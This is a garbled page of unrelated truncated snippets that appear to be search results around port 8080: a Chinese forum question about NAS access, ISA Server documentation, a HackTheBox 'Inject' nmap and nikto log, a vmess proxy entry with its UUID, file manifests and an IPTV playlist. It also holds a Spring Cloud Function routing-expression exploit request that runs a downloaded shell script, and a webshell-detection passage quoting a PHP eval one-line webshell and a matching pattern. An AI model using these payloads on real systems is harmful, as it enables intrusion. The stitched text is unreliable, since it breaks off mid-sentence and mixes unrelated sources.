分享33 pt吧 578671087 【211201】80端口无法访问rt,家宽。 说实话,在内网中,不管是用内网ipv4访问,还是用ipv6,访问nas黑裙只需要输入IP即可,默认就登录5000端口。 然而,当我吧v6绑在域名上,做好ddns等处理。通过域名访问始终无法成功,必须自己加上端口号才行,不管是内网还是外网。 按道理来说,dns服务器的作用...
Also, if ISA Server is configured as a VPN server and acts as a proxy server for Web Proxy clients, VPN client computers using the ISA Server as a proxy will use port 8080 of the ISA Server Internal network interface. By default, when you define a rule allowing access from the VPN ...
Nmap done: 1 IP address (1 host up) scanned in 121.16 seconds ┌──(kwkl㉿kwkl)-[~/HODL/htb/Inject]└─$ nikto -h - Nikto v2.1.6 --- + Target IP: + Target Hostname: + Target Port: 8080 + Start Time: 2023-03-30 10:...
{"name":"🇺🇸US美国4 48.6KB/s","type":"vmess","server":"","port":8080,"cipher":"auto","uuid":"ade73e62-7554-40a8-9314-195a372bae28","alterId":0,"tls":true,"skip-cert-verify":true,"network":"ws","ws-opts":{"path":"/7bFcoRZS?ed=2048","headers":{"...
{ + "startup": false, + "wait_interval": 0 + }, + "base_uri": "https://localhost:8080/", + "height": 153 + }, + "colab_type": "code", + "executionInfo": { + "elapsed": 388, + "status": "ok", + "timestamp": 1525154629129, + "user": { + "displayName": "",...
F ext/rtree/rtreeF.test 81ffa7ef51c4e4618d497a57328c265bf576990c7070633b623b23cd450ed331 F ext/rtree/rtreeG.test 1b9ca6e3effb48f4161edaa463ddeaa8fca4b2526d084f9cbf5dbe4e0184939c F ext/rtree/rtreeH.test aa08cc4fa8005b4c67446c7110205055b4d6da90e760e6f44b82dfa4cdf8d87a F... #EXTINF:-1 动画频道,宫崎骏动画 http://aldirect.hls.huya.com/huyalive/28466698-2689661530-11552008308659322880-3049003102-10057-A-0-1_1200.m3u8 #EXTINF:-1 ,黑莓电影
1. 2. 3. 4. 5. 6. 7. 8. 9. 10. 11. 12. 13. 14. 15. 16. wget succes bash! AI检测代码解析 POST /functionRouter HTTP/1.1 Host: spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("bash /tmp/pw.sh") Content-Type: application/...
4. 一句话WEBSHELL匹配 在实际的入侵攻防中我们会发现,由于批量工具以及攻击payload常常呈现变形程度梯度上升的趋势,简单形式的一句话占比较高,即 <?php eval($_POST['xx']);?> 因此,我们可以在检测流程中,增加对一句话小文件的快速匹配,即 1.ifcount(file) <80bytes2. then pattern: (eval|execute|assert...